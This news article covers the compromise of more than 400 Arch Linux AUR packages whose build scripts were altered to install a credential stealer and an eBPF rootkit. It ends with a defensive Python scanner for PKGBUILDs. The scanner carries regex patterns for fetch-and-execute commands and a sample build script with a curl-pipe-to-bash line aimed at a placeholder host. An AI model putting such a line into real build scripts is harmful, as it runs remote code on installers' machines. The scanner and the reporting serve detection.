A supply-chain attack compromised more than 400 Arch Linux AUR packages, deploying a credential stealer and eBPF rootkit.

More than 400 packages hosted on the Arch User Repository (AUR) were compromised in a large-scale supply-chain attack that distributed credential-stealing malware to Linux users, prompting an ongoing cleanup effort across the Arch Linux community.
The incident came to light on June 11 after maintainers and security researchers discovered malicious modifications embedded within hundreds of community-maintained packages. The affected packages were hosted on the AUR, Arch Linux’s user-driven software repository, and did not involve the project’s official software repositories.
According to researchers, the attackers exploited the AUR’s package adoption process by taking control of abandoned or orphaned packages. Once in control, they altered package build scripts so that malware would be downloaded and executed during installation.
The malicious payload was designed to collect sensitive information from infected systems, including credentials, authentication tokens, and developer-related secrets. Investigators said the malware was written in Rust and, when executed with root privileges, could also install an eBPF-based rootkit intended to conceal its presence on compromised machines.
Rather than exploiting a software vulnerability, the campaign abused trust in widely used community packages. The compromised packages retained their original names and histories, making the malicious changes difficult to spot during routine updates.
Arch Linux maintainers responded by removing malicious package revisions, banning accounts connected to the activity, and auditing affected packages. Community members have continued reviewing the repository as additional compromised packages are identified.
The attack has been described as one of the most significant security incidents to affect the AUR ecosystem. While more than 400 packages had been confirmed compromised as of June 12, researchers warned that the final number could increase as the investigation progresses.
Users who installed or updated AUR packages on or after June 11 are being urged to review affected package lists, rotate passwords and access tokens, and inspect systems for signs of compromise. Security experts also recommend treating potentially affected machines as untrusted until they can be thoroughly examined.
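The article describes build scripts altered so that code is fetched and executed at install time; as an added example (not code from the article or from the Arch Linux project), the following Python heuristic scans a PKGBUILD's build-time functions for that download-and-execute pattern, so a user triaging locally cached AUR packages can decide which ones need a careful manual read. The package name and host in the embedded samples are constructed placeholders.

```python
import re

# Shell functions in a PKGBUILD that makepkg executes on the installing user's machine.
BUILD_FUNCS = ("prepare", "pkgver", "build", "check", "package")
# Heuristics for "fetch code at build time and run it": a hit means "read this by hand",
# a triage signal rather than proof of compromise.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "network fetch piped into a shell"),
    (re.compile(r"\b(curl|wget)\b.*\s-[oO]\s*\S+"), "network download to a file in a build step"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\beval\b"), "eval of a dynamically built command"),
]
FUNC_START = re.compile(r"^\s*(\w+)\s*\(\)\s*\{?\s*$")

def scan_pkgbuild(text: str) -> list[tuple[str, int, str]]:
    """Return (function, line_no, reason) for suspicious lines inside build-time functions."""
    findings, current, depth = [], None, 0
    for n, line in enumerate(text.splitlines(), 1):
        code = line.split("#", 1)[0]  # drop comments (naive: assumes no '#' inside strings)
        m = FUNC_START.match(code)
        if current is None and m and m.group(1) in BUILD_FUNCS:
            current, depth = m.group(1), code.count("{") - code.count("}")
            continue
        if current is not None:
            depth += code.count("{") - code.count("}")  # naive: ${var} braces also count
            findings += [(current, n, why) for pat, why in SUSPICIOUS if pat.search(code)]
            if depth <= 0:  # closing brace of the function reached
                current = None
    return findings

# Constructed sample PKGBUILD; the package name and host are placeholders, not a real package.
CLEAN_PKGBUILD = """\
pkgname=hello-tool
pkgver=1.0.0
source=("https://example.invalid/hello-tool-1.0.0.tar.gz")
sha256sums=('SKIP')
build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
}
package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
"""
# Same PKGBUILD with the pattern the article describes: build() fetches and runs a script
# that is not part of the declared, checksummed source= array.
TAMPERED_PKGBUILD = CLEAN_PKGBUILD.replace(
    "  make\n", "  make\n  curl -fsSL https://example.invalid/update.sh | bash\n")
```

Run `scan_pkgbuild()` over each PKGBUILD under your AUR helper's cache directory and read every flagged function by hand; an empty result does not clear a package, it only means none of these four patterns appeared.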
The investigation remains active as researchers work to determine the full scope of the campaign and assess the long-term impact on Arch Linux users and downstream distributions that rely on AUR packages.